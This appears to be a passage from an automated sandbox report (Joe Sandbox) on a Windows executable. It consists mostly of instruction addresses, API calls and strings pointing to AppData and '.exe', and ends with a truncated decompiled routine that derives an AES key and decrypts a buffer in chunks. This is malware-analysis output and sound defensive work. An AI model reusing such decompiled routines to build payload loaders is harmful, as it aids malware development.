0x0040832c
0x0040832e
0x00408333
0x00000000
0x00408318
0x00408318
0x0040831b
0x00408323
0x00408326
0x00000000
0x00000000
0x00000000
0x00000000
0x00408326
0x00408316
0x004082b2
0x004082b2
0x004082b8
0x004082b9
0x004082bb
0x004082c1
0x004082d7
0x004082d7
0x004082d9
0x004082de
0x00000000
0x004082c3
0x004082c3
0x004082c6
0x004082ce
0x004082d1
0x00000000
0x00000000
0x00000000
0x00000000
0x004082d1
0x004082c1
0x0040825d
0x0040825d
0x00408263
0x00408264
0x00408266
0x0040826c
0x00408282
0x00408282
0x00408284
0x00408289
0x00000000
0x0040826e
0x0040826e
0x00408271
0x00408279
0x0040827c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040827c
0x0040826c
0x00408208
0x00408208
0x0040820e
0x0040820f
0x00408211
0x00408217
0x0040822d
0x0040822d
0x0040822f
0x00408234
0x00000000
0x00408219
0x00408219
0x0040821c
0x00408224
0x00408227
0x00000000
0x00000000
0x00000000
0x00000000
0x00408227
0x00408217
0x00408206
0x004080da
0x004080da
0x004080e0
0x004080e1
0x004080e3
0x004080e9
0x004080ff
0x004080ff
0x00408101
0x00408106
0x00000000
0x004080eb
0x004080eb
0x004080ee
0x004080f6
0x004080f9
0x00000000
0x00000000
0x00000000
0x00000000
0x004080f9
0x004080e9
0x00408081
0x00408081
0x00408087
0x00408088
0x0040808a
0x00408090
0x004080a6
0x004080a6
0x004080a8
0x004080ad
0x00000000
0x00408092
0x00408092
0x00408095
0x0040809d
0x004080a0
0x00000000
0x00000000
0x00000000
0x00000000
0x004080a0
0x00408090
0x00408028
0x00408028
0x0040802e
0x0040802f
0x00408031
0x00408037
0x0040804d
0x0040804d
0x0040804f
0x00408054
0x00000000
0x00408039
0x00408039
0x0040803c
0x00408044
0x00408047
0x00000000
0x00000000
0x00000000
0x00000000
0x00408047
0x00408037
0x00406b28
0x00406b28
0x00406b37
0x00406b3d
0x00406b3f
0x00406b6d
0x00406b6f
0x00406b72
0x00406b74
0x00406b74
0x00406b77
0x00406b77
0x00406b79
0x00406b7a
0x00406b7a
0x00406b7e
0x00406b7e
0x00406b80
0x00406b81
0x00406b41
0x00406b41
0x00406b47
0x00406b4a
0x00406b4a
0x00406b50
0x00406b50
0x00406b52
0x00406b53
0x00406b55
0x00000000
0x00406b57
0x00406b5f
0x00406b60
0x00406b60
0x00406b55
0x00406b88
0x00406b93
0x00406b98
0x00406b9c
0x00406ba1
0x00406ba9
0x00406bb2
0x00406bb7
0x00406bbe
0x00406bc8
0x00406bd6
0x00406be3
0x00406be8
0x00406bf2
0x00406bf7
0x00406bfd
0x00406c00
0x00406c31
0x00406c31
0x00406c35
0x00406c3b
0x00406c45
0x00406c4f
0x00406c56
0x00406c59
0x00406c8a
0x00406c8a
0x00406c95
0x00406c9c
0x00406ca1
0x00406ca4
0x00406cae
0x00406cb1
0x00406cb6
0x00406cba
0x00406cbf
0x00406cc2
0x00406cc4
0x00406f15
0x00406f1c
0x00406f1e
0x00406f23
0x00406f29
0x00406f30
0x00406f35
0x00406f38
0x00406f3f
0x00406f41
0x00406f53
0x00406f5a
0x00406f5f
0x00406f6c
0x00406f71
0x00406f71
0x00406f3f
0x00406f74
0x00406f79
0x00406f7b
0x00406f7d
0x00406f86
0x00406f8d
0x00406f91
0x00406f96
0x00406f96
0x00406f9d
0x00406fa2
0x00406fac
0x00406fb6
0x00406fc0
0x00406fc7
0x00406fc7
0x00406fca
0x00406fd0
0x00406fd0
0x00406fd2
0x00406fd3
0x00406fd3
0x00406fe5
0x00406fea
0x00406fee
0x00406ff6
0x00406ffe
0x00407001
0x00407031
0x00407046
0x00407003
0x00407003
0x00407006
0x00407009
0x00407015
0x0040701c
0x00407022
0x00407022
0x0040704b
0x00407055
0x0040705f
0x00407069
0x0040706c
0x00407073
0x00407078
0x00407080
0x00407087
0x0040708e
0x00407097
0x004070a8
0x004070ad
0x004070b7
0x004070bc
0x004070c2
0x004070c5
0x004070f6
0x004070f6
0x004070fa
0x00407100
0x0040710a
0x00407114
0x0040711b
0x0040711e
0x0040714f
0x0040714f
0x00407153
0x00407159
0x00407163
0x0040716d
0x00407174
0x00407177
0x004071a8
0x004071a8
0x004071b3
0x004071ba
0x004071bf
0x004071c2
0x004071cc
0x004071cf
0x004071d4
0x004071d8
0x004071dd
0x004071e0
0x004071e2
0x004073d8
0x004073dd
0x004073e7
0x004073f1
0x004073fb
0x00407404
0x0040740b
0x00407411
0x00407418
0x0040741d
0x00407420
0x00407427
0x0040742f
0x00407437
0x00407443
0x00407454
0x0040745c
0x00407461
0x0040746e
0x00407473
0x00407473
0x00407427
0x00407476
0x0040747d
0x0040747f
0x0040747f
0x00407481
0x00407481
0x00407488
0x00407489
0x00407489
0x00407481
0x0040748e
0x00407493
0x0040749d
0x004074a7
0x004074b1
0x004074b8
0x004074b8
0x004074c0
0x004074c0
0x004074c2
0x004074c3
0x004074c3
0x004074d5
0x004074da
0x004074de
0x004074e6
0x004074ee
0x004074f1
0x00407521
0x00407536
0x004074f3
0x004074f3
0x004074f6
0x004074f9
0x00407505
0x0040750c
0x00407512
0x00407512
0x0040753b
0x00407545
0x0040754f
0x00407559
0x0040755c
0x00407563
0x00407568
0x00407570
0x00407577
0x0040757e
0x00407587
0x00407598
0x0040759d
0x004075a7
0x004075ac
0x004075b2
0x004075b5
0x004075e6
0x004075e6
0x004075ea
0x004075f0
0x004075fa
0x00407604
0x0040760b
0x0040760e
0x0040763f
0x0040763f
0x00407643
0x00407649
0x00407653
0x0040765d
0x00407664
0x00407667
0x00407698
0x00407698
0x004076a3
0x004076aa
0x004076af
0x004076b2
0x004076bc
0x004076bf
0x004076c4
0x004076c8
0x004076cd
0x004076d0
0x004076d2
0x004078c8
0x004078cd
0x004078d7
0x004078e1
0x004078e7
0x004078ee
0x004078f3
0x004078f6
0x004078fd
0x00407910
0x00407915
0x0040791b
0x00407928
0x0040792d
0x0040792d
0x004078fd
0x00407930
0x00407935
0x00407937
0x00407939
0x00407940
0x00407947
0x0040794e
0x00407955
0x0040795c
0x00407963
0x0040796a
0x0040796a
0x0040796c
0x0040796c
0x00407971
0x00407976
0x00407980
0x0040798a
0x00407994
0x0040799b
0x0040799b
0x004079a0
0x004079a0
0x004079a2
0x004079a3
0x004079a3
0x004079b5
0x004079ba
0x004079be
0x004079c6
0x004079ce
0x004079d1
0x00407a01
0x00407a16
0x004079d3
0x004079d3
0x004079d6
0x004079d9
0x004079e5
0x004079ec
0x004079f2
0x004079f2
0x00407a1b
0x00407a25
0x00407a2f
0x00407a39
0x00407a3c
0x00407a43
0x00407a48
0x00407a50
0x00407a57
0x00407a5e
0x00407a67
0x00407a78
0x00407a7d
0x00407a87
0x00407a8c
0x00407a92
0x00407a95
0x00407ac6
0x00407ac6
0x00407aca
0x00407ad0
0x00407ada
0x00407ae4
0x00407aeb
0x00407aee
0x00407b1f
0x00407b1f
0x00407b23
0x00407b29
0x00407b33
0x00407b3d
0x00407b44
0x00407b47
0x00407b78
0x00407b78
0x00407b83
0x00407b8a
0x00407b8f
0x00407b92
0x00407b9c
0x00407b9f
0x00407ba4
0x00407ba8
0x00407bad
0x00407bb0
0x00407bb2
0x00407da8
0x00407dac
0x00407db2
0x00407db5
0x00407de6
0x00407de6
0x00407dea
0x00407df0
0x00407dfa
0x00407e04
0x00407e0b
0x00407e0e
0x00408cae
0x00408cb5
0x00408cba
0x00408cc0
0x00000000
0x00407e14
0x00407e14
0x00407e1a
0x00407e1b
0x00407e1d
0x00407e23
0x00407e39
0x00407e39
0x00407e3b
0x00000000
0x00407e25
0x00407e25
0x00407e28
0x00407e30
0x00407e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e33
0x00407e23
0x00407db7
0x00407db7
0x00407dbd
0x00407dbe
0x00407dc0
0x00407dc6
0x00407ddc
0x00407ddc
0x00407dde
0x00407de3
0x00000000
0x00407dc8
0x00407dc8
0x00407dcb
0x00407dd3
0x00407dd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00407dd6
0x00407dc6
0x00407bb8
0x00407bb8
0x00407bc5
0x00407bd3
0x00407be0
0x00407be5
0x00407be8
0x00407bea
0x00407bee
0x00407bf3
0x00407bf8
0x00407bfb
0x00407c21
0x00407c35
0x00407bfd
0x00407c00
0x00407c03
0x00407c05
0x00407c08
0x00407c0a
0x00407c0a
0x00407c0c
0x00407c13
0x00407c13
0x00407c37
0x00407c3d
0x00407c44
0x00407c4b
0x00407c4e
0x00407c51
0x00407c56
0x00407c5b
0x00407c62
0x00407c69
0x00407c6c
0x00407c72
0x00407c75
0x00407ca6
0x00407ca6
0x00407cac
0x00407cb6
0x00407cc0
0x00407cc7
0x00407cca
0x00407cfb
0x00407cfb
0x00407d01
0x00407d0b
0x00407d15
0x00407d1c
0x00407d1f
0x00407d50
0x00407d50
0x00407d56
0x00407d60
0x00407d6a
0x00407d71
0x00407d74
0x00000000
0x00407d7a
0x00407d7a
0x00407d80
0x00407d81
0x00407d83
0x00407d89
0x00000000
0x00407d8f
0x00407d8f
0x00407d92
0x00407d9a
0x00407d9d
0x00000000
0x00407da3
0x00000000
0x00407da3
0x00407d9d
0x00407d89
0x00407d21
0x00407d21
0x00407d27
0x00407d28
0x00407d2a
0x00407d30
0x00407d46
0x00407d46
0x00407d48
0x00407d4d
0x00000000
0x00407d32
0x00407d32
0x00407d35
0x00407d3d
0x00407d40
0x00000000
0x00000000
0x00000000
0x00000000
0x00407d40
0x00407d30
0x00407ccc
0x00407ccc
0x00407cd2
0x00407cd3
0x00407cd5
0x00407cdb
0x00407cf1
0x00407cf1
0x00407cf3
0x00407cf8
0x00000000
0x00407cdd
0x00407cdd
0x00407ce0
0x00407ce8
0x00407ceb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ceb
0x00407cdb
0x00407c77
0x00407c77
0x00407c7d
0x00407c7e
0x00407c80
0x00407c86
0x00407c9c
0x00407c9c
0x00407c9e
0x00407ca3
0x00000000
0x00407c88
0x00407c88
0x00407c8b
0x00407c93
0x00407c96
0x00000000
0x00000000
0x00000000
0x00000000
0x00407c96
0x00407c86
0x00407c75
0x00407b49
0x00407b49
0x00407b4f
0x00407b50
0x00407b52
0x00407b58
0x00407b6e
0x00407b6e
0x00407b70
0x00407b75
0x00000000
0x00407b5a
0x00407b5a
0x00407b5d
0x00407b65
0x00407b68
0x00000000
0x00000000
0x00000000
0x00000000
0x00407b68
0x00407b58
0x00407af0
0x00407af0
0x00407af6
0x00407af7
0x00407af9
0x00407aff
0x00407b15
0x00407b15
0x00407b17
0x00407b1c
0x00000000
0x00407b01
0x00407b01
0x00407b04
0x00407b0c
0x00407b0f
0x00000000
0x00000000
0x00000000
0x00000000
0x00407b0f
0x00407aff
0x00407a97
0x00407a97
0x00407a9d
0x00407a9e
0x00407aa0
0x00407aa6
0x00407abc
0x00407abc
0x00407abe
0x00407ac3
0x00000000
0x00407aa8
0x00407aa8
0x00407aab
0x00407ab3
0x00407ab6
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab6
0x00407aa6
0x004076d8
0x004076d8
0x004076e5
0x004076f3
0x00407700
0x00407705
0x00407708
0x0040770a
0x0040770e
0x00407713
0x00407718
0x0040771b
0x00407741
0x00407755
0x0040771d
0x00407720
0x00407723
0x00407725
0x00407728
0x0040772a
0x0040772a
0x0040772c
0x00407733
0x00407733
0x00407757
0x0040775d
0x00407764
0x0040776b
0x0040776e
0x00407771
0x00407776
0x0040777b
0x00407782
0x00407789
0x0040778c
0x00407792
0x00407795
0x004077c6
0x004077c6
0x004077cc
0x004077d6
0x004077e0
0x004077e7
0x004077ea
0x0040781b
0x0040781b
0x00407821
0x0040782b
0x00407835
0x0040783c
0x0040783f
0x00407870
0x00407870
0x00407876
0x00407880
0x0040788a
0x00407891
0x00407894
0x00000000
0x0040789a
0x0040789a
0x004078a0
0x004078a1
0x004078a3
0x004078a9
0x00000000
0x004078af
0x004078af
0x004078b2
0x004078ba
0x004078bd
0x00000000
0x004078c3
0x00000000
0x004078c3
0x004078bd
0x004078a9
0x00407841
0x00407841
0x00407847
0x00407848
0x0040784a
0x00407850
0x00407866
0x00407866
0x00407868
0x0040786d
0x00000000
0x00407852
0x00407852
0x00407855
0x0040785d
0x00407860
0x00000000
0x00000000
0x00000000
0x00000000
0x00407860
0x00407850
0x004077ec
0x004077ec
0x004077f2
0x004077f3
0x004077f5
0x004077fb
0x00407811
0x00407811
0x00407813
0x00407818
0x00000000
0x004077fd
0x004077fd
0x00407800
0x00407808
0x0040780b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040780b
0x004077fb
0x00407797
0x00407797
0x0040779d
0x0040779e
0x004077a0
0x004077a6
0x004077bc
0x004077bc
0x004077be
0x004077c3
0x00000000
0x004077a8
0x004077a8
0x004077ab
0x004077b3
0x004077b6
0x00000000
0x00000000
0x00000000
0x00000000
0x004077b6
0x004077a6
0x00407795
0x00407669
0x00407669
0x0040766f
0x00407670
0x00407672
0x00407678
0x0040768e
0x0040768e
0x00407690
0x00407695
0x00000000
0x0040767a
0x0040767a
0x0040767d
0x00407685
0x00407688
0x00000000
0x00000000
0x00000000
0x00000000
0x00407688
0x00407678
0x00407610
0x00407610
0x00407616
0x00407617
0x00407619
0x0040761f
0x00407635
0x00407635
0x00407637
0x0040763c
0x00000000
0x00407621
0x00407621
0x00407624
0x0040762c
0x0040762f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040762f
0x0040761f
0x004075b7
0x004075b7
0x004075bd
0x004075be
0x004075c0
0x004075c6
0x004075dc
0x004075dc
0x004075de
0x004075e3
0x00000000
0x004075c8
0x004075c8
0x004075cb
0x004075d3
0x004075d6
0x00000000
0x00000000
0x00000000
0x00000000
0x004075d6
0x004075c6
0x004071e8
0x004071e8
0x004071f5
0x00407203
0x00407210
0x00407215
0x00407218
0x0040721a
0x0040721e
0x00407223
0x00407228
0x0040722b
0x00407251
0x00407265
0x0040722d
0x00407230
0x00407233
0x00407235
0x00407238
0x0040723a
0x0040723a
0x0040723c
0x00407243
0x00407243
0x00407267
0x0040726d
0x00407274
0x0040727b
0x0040727e
0x00407281
0x00407286
0x0040728b
0x00407292
0x00407299
0x0040729c
0x004072a2
0x004072a5
0x004072d6
0x004072d6
0x004072dc
0x004072e6
0x004072f0
0x004072f7
0x004072fa
0x0040732b
0x0040732b
0x00407331
0x0040733b
0x00407345
0x0040734c
0x0040734f
0x00407380
0x00407380
0x00407386
0x00407390
0x0040739a
0x004073a1
0x004073a4
0x00000000
0x004073aa
0x004073aa
0x004073b0
0x004073b1
0x004073b3
0x004073b9
0x00000000
0x004073bf
0x004073bf
0x004073c2
0x004073ca
0x004073cd
0x00000000
0x004073d3
0x00000000
0x004073d3
0x004073cd
0x004073b9
0x00407351
0x00407351
0x00407357
0x00407358
0x0040735a
0x00407360
0x00407376
0x00407376
0x00407378
0x0040737d
0x00000000
0x00407362
0x00407362
0x00407365
0x0040736d
0x00407370
0x00000000
0x00000000
0x00000000
0x00000000
0x00407370
0x00407360
0x004072fc
0x004072fc
0x00407302
0x00407303
0x00407305
0x0040730b
0x00407321
0x00407321
0x00407323
0x00407328
0x00000000
0x0040730d
0x0040730d
0x00407310
0x00407318
0x0040731b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040731b
0x0040730b
0x004072a7
0x004072a7
0x004072ad
0x004072ae
0x004072b0
0x004072b6
0x004072cc
0x004072cc
0x004072ce
0x004072d3
0x00000000
0x004072b8
0x004072b8
0x004072bb
0x004072c3
0x004072c6
0x00000000
0x00000000
0x00000000
0x00000000
0x004072c6
0x004072b6
0x004072a5
0x00407179
0x00407179
0x0040717f
0x00407180
0x00407182
0x00407188
0x0040719e
0x0040719e
0x004071a0
0x004071a5
0x00000000
0x0040718a
0x0040718a
0x0040718d
0x00407195
0x00407198
0x00000000
0x00000000
0x00000000
0x00000000
0x00407198
0x00407188
0x00407120
0x00407120
0x00407126
0x00407127
0x00407129
0x0040712f
0x00407145
0x00407145
0x00407147
0x0040714c
0x00000000
0x00407131
0x00407131
0x00407134
0x0040713c
0x0040713f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040713f
0x0040712f
0x004070c7
0x004070c7
0x004070cd
0x004070ce
0x004070d0
0x004070d6
0x004070ec
0x004070ec
0x004070ee
0x004070f3
0x00000000
0x004070d8
0x004070d8
0x004070db
0x004070e3
0x004070e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004070e6
0x004070d6
0x00406cca
0x00406cca
0x00406cd7
0x00406ce5
0x00406cf2
0x00406cf7
0x00406cfa
0x00406cfc
0x00406d00
0x00406d05
0x00406d0a
0x00406d0d
0x00406d33
0x00406d47
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d1a
0x00406d1c
0x00406d1c
0x00406d1e
0x00406d25
0x00406d25
0x00406d49
0x00406d4f
0x00406d56
0x00406d5d
0x00406d60
0x00406d63
0x00406d68
0x00406d6d
0x00406d74
0x00406d7b
0x00406d7e
0x00406d84
0x00406d87
0x00406db8
0x00406db8
0x00406dbe
0x00406dc8
0x00406dd2
0x00406dd9
0x00406ddc
0x00406e0d
0x00406e0d
0x00406e13
0x00406e1d
0x00406e27
0x00406e2e
0x00406e31
0x00406e62
0x00406e62
0x00406e68
0x00406e72
0x00406e7c
0x00406e83
0x00406e86
0x00406eb7
0x00406eb7
0x00406ec1
0x00406ecb
0x00406ed2
0x00406ed2
0x00406ed8
0x00406edb
0x00408cc5
0x00408cca
0x00408cd2
0x00408cd3
0x00408cd7
0x00408ce4
0x00406ee1
0x00406ee1
0x00406ee7
0x00406ee8
0x00406eea
0x00406ef0
0x00408869
0x00408869
0x0040886b
0x00000000
0x00406ef6
0x00406ef6
0x00406ef9
0x00406f01
0x00406f04
0x00000000
0x00406f0a
0x00000000
0x00406f0a
0x00406f04
0x00406ef0
0x00406e88
0x00406e88
0x00406e8e
0x00406e8f
0x00406e91
0x00406e97
0x00406ead
0x00406ead
0x00406eaf
0x00406eb4
0x00000000
0x00406e99
0x00406e99
0x00406e9c
0x00406ea4
0x00406ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ea7
0x00406e97
0x00406e33
0x00406e33
0x00406e39
0x00406e3a
0x00406e3c
0x00406e42
0x00406e58
0x00406e58
0x00406e5a
0x00406e5f
0x00000000
0x00406e44
0x00406e44
0x00406e47
0x00406e4f
0x00406e52
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e52
0x00406e42
0x00406dde
0x00406dde
0x00406de4
0x00406de5
0x00406de7
0x00406ded
0x00406e03
0x00406e03
0x00406e05
0x00406e0a
0x00000000
0x00406def
0x00406def
0x00406df2
0x00406dfa
0x00406dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406dfd
0x00406ded
0x00406d89
0x00406d89
0x00406d8f
0x00406d90
0x00406d92
0x00406d98
0x00406dae
0x00406dae
0x00406db0
0x00406db5
0x00000000
0x00406d9a
0x00406d9a
0x00406d9d
0x00406da5
0x00406da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00406da8
0x00406d98
0x00406d87
0x00406c5b
0x00406c5b
0x00406c61
0x00406c62
0x00406c64
0x00406c6a
0x00406c80
0x00406c80
0x00406c82
0x00406c87
0x00000000
0x00406c6c
0x00406c6c
0x00406c6f
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c7a
0x00406c6a
0x00406c02
0x00406c02
0x00406c08
0x00406c09
0x00406c0b
0x00406c11
0x00406c27
0x00406c27
0x00406c29
0x00406c2e
0x00000000
0x00406c13
0x00406c13
0x00406c16
0x00406c1e
0x00406c21
0x00408ce5
0x00408ce5
0x00408cea
0x00408cea
0x00408cef
0x00408cef
0x00408cf4
0x00408cf5
0x00408cf6
0x00408cf7
0x00408cf8
0x00408cf9
0x00408cfa
0x00408cfb
0x00408cfc
0x00408cfd
0x00408cfe
0x00408cff
0x00408d00
0x00408d01
0x00408d03
0x00408d05
0x00408d10
0x00408d11
0x00408d17
0x00408d1c
0x00408d1e
0x00408d21
0x00408d22
0x00408d23
0x00408d24
0x00408d28
0x00408d2e
0x00408d35
0x00408d3a
0x00408d40
0x00408d42
0x00408d44
0x00408d50
0x00408d50
0x00408d55
0x00408d58
0x00408d5f
0x00408d66
0x00408d66
0x00408d50
0x00408d73
0x00408d78
0x00408d8f
0x00408d96
0x00408dad
0x00408db4
0x00408db8
0x00408dcb
0x00408dd6
0x00408de0
0x00408deb
0x00408df8
0x00408e03
0x00408e0d
0x00408e18
0x00408e22
0x00408e31
0x00408e38
0x00408e3d
0x00408e46
0x00408e51
0x00408e5c
0x00408e67
0x00408e72
0x00408e7d
0x00408e88
0x00408e8c
0x00408e91
0x00408e91
0x00408e93
0x00408ea0
0x00408ea3
0x00408ea4
0x00408eaa
0x00408eb0
0x00408eb5
0x00408eb7
0x00000000
0x00000000
0x00408ec8
0x00408ecd
0x00408ed5
0x00408eda
0x00408edc
0x00408ede
0x00408ee6
0x00408eeb
0x00408eed
0x00408eef
0x00408ef2
0x00000000
0x00408ef2
0x00408eed
0x00408f2e
0x00408f36
0x00408f3b
0x00408f3e
0x00408f48
0x00408f4d
0x00408f51
0x00408f64
0x00408f6a
0x00408f6f
0x00408f79
0x00408f7e
0x00408f83
0x00408f93
0x00408f9e
0x00408fa0
0x00408fab
0x00408faf
0x00408fb4
0x00408fb6
0x00000000
0x00000000
0x00408fc7
0x00408fcf
0x00408fd4
0x00408fd7
0x00000000
0x00000000
0x00408fd9
0x00408fdc
0x00000000
0x00000000
0x00408fea
0x00408ff3
0x00408ff3
0x00408ff5
0x00408ffa
0x00409000
0x00409001
0x0040901a
0x00409020
0x00409025
0x0040902f
0x00409034
0x00409039
0x00409049
0x00409056
0x00409061
0x00409065
0x0040906a
0x0040906c
0x00000000
0x00409072
0x0040907d
0x0040907f
0x00409082
0x00000000
0x00409088
0x00409096
0x00409097
0x0040909f
0x004090a2
0x004090ac
0x004090c5
0x004090c6
0x004090cb
0x004090ce
0x004090da
0x004090e7
0x004090ea
0x004090f8
0x00409102
0x00409107
0x0040910a
0x00409110
0x00409117
0x0040912d
0x00409133
0x00409135
0x0040913c
0x0040913c
0x00409140
0x0040915c
0x0040915e
0x00409161
0x00409167
0x0040916c
0x0040916e
0x00409170
0x00409175
0x00409175
0x00409178
0x0040917b
0x0040917d
0x00409183
0x00409183
0x00409186
0x00409189
0x00409194
0x00409197
0x00000000
0x00000000
0x00000000
0x00000000
0x0040918b
0x0040918b
0x0040918e
0x00409190
0x00409190
0x00409199
0x00409199
0x0040919b
0x00000000
0x0040919d
0x0040919d
0x004091a0
0x004091c4
0x00000000
0x00000000
0x00000000
0x004091a0
0x0040919b
0x00000000
0x004091a2
0x004091a2
0x004091ad
0x004091b0
0x004091b1
0x004091b7
0x004091b9
0x004091b9
0x00000000
0x00000000
0x00000000
0x00409117
0x00409082
0x004091c6
0x004091c6
0x004091cb
0x004091cc
0x004091cd
0x004091ce
0x004091cf
0x004091d0
0x004091d1
0x004091d6
0x004091dd
0x004091e6
0x004091ed
0x004091f4
0x004091fa
0x004091fc
0x00409201
0x00409207
0x0040920e
0x00409216
0x0040921d
0x0040921f
0x0040922a
0x00409236
0x0040923b
0x00409243
0x00409249
0x00409253
0x00409258
0x0040921d
0x00409263
0x0040926d
0x00000000
0x00409119
0x00409119
0x0040911f
0x0040911f
0x00000000
0x00408fde
0x00408fe3
0x00408fe3
0x00408ef7
0x00408ef7
0x00408efd
0x00408f1a
0x00408f24
0x00408eff
0x00408eff
0x00408f04
0x00408f14
0x00408f14
0x00408efd
0x00000000
0x00000000
0x00000000
0x00406c21
0x00406c11
0x00406c00
0x00000000
0x00000000
0x00000000
0x00406a30
0x00406a20
0x00406a12
0x00000000

APIs

CreateDirectoryA.KERNELBASE(0040813E,00000000,8E1B5714,?), ref: 0040684F
GetLastError.KERNEL32 ref: 00406859
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,8E1B5714,?,00000000), ref: 00406B37
__Init_thread_footer.LIBCMT ref: 00406F6C
Sleep.KERNEL32(?,8E1B5714), ref: 00408D5F

Part of subcall function 00402990: Concurrency::cancel_current_task.LIBCPMT ref: 00402AE3

__Init_thread_footer.LIBCMT ref: 0040746E
__Init_thread_footer.LIBCMT ref: 00407928

Strings

APPDATA, xrefs: 00406B63
KC^., xrefs: 004078D7
\AI\, xrefs: 004073E7
.exe, xrefs: 004068BF, 00406D2E, 0040724C, 0040773C, 00407C1C
OCjO, xrefs: 004073F1

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCreateDirectoryErrorFolderLastPathSleep
String ID: .exe$APPDATA$KC^.$OCjO$\AI\
API String ID: 1816155683-1469489693
Opcode ID: 42f0b91edf14db2fdc67ef9be8656bb7482780502be66172b564ace212df0076
Instruction ID: bf5f6c512fa4f3d1ff6270b27b628875754c34fdae461c9e81a75f356b5f0325
Opcode Fuzzy Hash: 42f0b91edf14db2fdc67ef9be8656bb7482780502be66172b564ace212df0076
Instruction Fuzzy Hash: 75E24770A002549BEB29DB28CD447DDBB71AF46308F1082EDD449BB2D2DB799BC4CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403770 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00403770(void* __ebx, int __ecx, int __edx, void* __edi, intOrPtr* _a4, void* _a8, intOrPtr _a24, intOrPtr _a28) {
				long* _v8;
				char _v16;
				signed int _v24;
				void _v136;
				long* _v140;
				int _v144;
				char _v148;
				long* _v152;
				int _v156;
				signed int _v160;
				int _v164;
				BYTE* _v168;
				int _v172;
				intOrPtr* _v176;
				int _v180;
				intOrPtr _v220;
				void* __esi;
				void* __ebp;
				signed int _t69;
				signed int _t70;
				void* _t77;
				intOrPtr* _t82;
				char* _t92;
				void* _t94;
				intOrPtr _t95;
				void* _t99;
				int _t100;
				void* _t101;
				BYTE* _t103;
				intOrPtr _t106;
				int _t117;
				void* _t118;
				intOrPtr* _t126;
				void* _t127;
				int _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t140;
				signed int _t145;
				void* _t146;
				intOrPtr* _t147;
				signed int _t149;
				void* _t150;
				void* _t151;
				void* _t152;
				intOrPtr* _t153;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t69 =  *0x43d054; // 0x8e1b5714
				_t70 = _t69 ^ _t155;
				_v24 = _t70;
				 *[fs:0x0] =  &_v16;
				_t117 = __edx;
				_v172 = __edx;
				_v156 = __ecx;
				_v176 = _a4;
				_v8 = 0;
				_t151 = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
				_v160 = _a24 + _a24;
				_t77 = memcpy( &_v136, _t151, 0x1b << 2);
				_t159 = _t157 - 0xa8 + 0xc;
				__imp__CryptAcquireContextW(_t77, 0,  &_v136, 0x18, 0xf0000000, _t70, __edi, _t150, __ebx,  *[fs:0x0], 0x42c2cd, 0xffffffff); // executed
				if(_t77 == 0) {
					L7:
					_t145 = GetLastError();
					CryptReleaseContext(_v140, 0);
				} else {
					_t92 =  &_v148;
					__imp__CryptCreateHash(_v140, 0x800c, 0, 0, _t92); // executed
					if(_t92 == 0) {
						goto L7;
					} else {
						_t94 =  >=  ? _a8 :  &_a8;
						_t147 = _t94;
						_v164 = _t94;
						_t127 = _t147 + 1;
						do {
							_t95 =  *_t147;
							_t147 = _t147 + 1;
							_t168 = _t95;
						} while (_t95 != 0);
						_t149 = _t147 - _t127 + 1;
						_t151 = E0040ED8D(_t117, _t149, _t151, _t168,  ~(0 | _t168 > 0x00000000) | _t149 * 0x00000002);
						_t99 = E004164FC(_t151, _v164, _t149);
						_t159 = _t159 + 0x10;
						__imp__CryptHashData(_v148, _t151, _v160, 0);
						if(_t99 != 0) {
							_t100 =  &_v152;
							__imp__CryptDeriveKey(_v140, 0x660e, _v148, 0, _t100); // executed
							__eflags = _t100;
							if(__eflags != 0) {
								_push(_t117); // executed
								_t101 = E0041626E(); // executed
								_t151 = _t101;
								E00410440(_t151, _v156, _t117);
								_t103 = E0040ED8D(_t117, _t149, _t151, __eflags, 0xa0);
								_t138 = _v172;
								_t145 = 0;
								_t159 = _t159 + 0x14;
								_v168 = _t103;
								_v144 = 0;
								_v156 = 0;
								_v160 = 0;
								__eflags = _t138;
								if(__eflags != 0) {
									_t132 = _t138;
									_t106 = 0xa0 - _t151;
									__eflags = 0xa0;
									_v164 = _t132;
									_v180 = 0xa0;
									while(1) {
										_t117 = 0xa0;
										__eflags = _t106 + _t151 - _t138;
										if(_t106 + _t151 >= _t138) {
											_t117 = _t132;
											_v156 = 1;
										}
										_v144 = _t117;
										E00410440(_v168, _t151, _t117);
										_t159 = _t159 + 0xc;
										__eflags = CryptDecrypt(_v152, 0, _v156, 0, _v168,  &_v144);
										if(__eflags == 0) {
											goto L15;
										}
										E00410440( *_v176 + _t145, _v168, _v144);
										_t145 = _t145 + _v144;
										_t159 = _t159 + 0xc;
										__eflags = _t117 - 0xa0;
										if(__eflags == 0) {
											_t151 = _t151 + _t117;
											_t140 = _v160 + 1;
											_t106 = _v180;
											_t132 = _v164 - _t117;
											__eflags = _t140 - _v172;
											_v160 = _t140;
											_t138 = _v172;
											_v164 = _t132;
											if(__eflags < 0) {
												continue;
											}
										}
										goto L15;
									}
								}
								L15:
								CryptDestroyKey(_v152);
